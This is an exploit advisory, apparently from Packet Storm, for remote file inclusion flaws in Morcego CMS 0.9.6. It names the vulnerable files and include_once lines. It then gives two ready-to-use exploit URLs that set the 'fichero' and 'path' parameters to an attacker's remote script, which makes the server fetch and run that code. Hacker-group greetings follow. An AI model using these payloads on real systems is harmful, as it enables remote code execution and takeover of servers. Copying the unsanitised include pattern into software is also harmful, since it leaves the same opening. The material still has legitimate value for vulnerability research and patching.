Morcego CMS 0.9.6 suffers from several remote file inclusion vulnerabilities.
159382245e5a3d6cde4a268e51a2e4d53062a6f583d28373fb46ef21aa263d73=====================================================================
# Morcego CMS <= 0.9.6 Remote File Inclue Vulnerability
=====================================================================
# Author : Le CoPrA
=====================================================================
# Download Script : https://www.linkini.net/phpscripts/descargas/Portales%20PHP%20(13%20Archivos)/Morcego%20CMS%200.9.6.0.zip
=====================================================================
# Bugs in
(1) includes/morcegoCMS/morcegoCMS.php
(2) includes/morcegoCMS/adodb/adodb.inc.php
# Vuln Code 1 :
include_once($fichero);
# Vuln Code 2 :
include_once($path);
$class = "ADODB2_$drivername";
=====================================================================
# Exploits :
https://www.victim.com/[path]/includes/morcegoCMS/morcegoCMS.php?fichero=|SCRIPT-URL|
https://www.victim.com/[path]/includes/morcegoCMS/adodb/adodb.inc.php?path=|SCRIPT-URL|
=====================================================================
# Discovered by : Le CoPrA
# ConTaCT : Le.CoPrA |at| Hotmail |dot| CoM
# Special Greetz FlyinG 2 || Str0ke ||
# Greetz4// alkasrgolden, LovER BoY, Saudi Hackrz, HACKERS PAL, Black-Code, CrAsH_oVeR_rIdE, bOhAjEr, Broken-Proxy, simo64
3theaby geer,Mohajer22,Qaher_Yhod,MR.WOLF,cRiMiNaL NeT,al3iznet,Abdullah-00 ,egyptghost,ToOoFA,KaBaRa,HakrAwY
# Channel : wWw.TrYaG.cOm/vb || WwW.kOnDoR4.Com/vb || wWw.Q8cracker.com
===========================================================================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed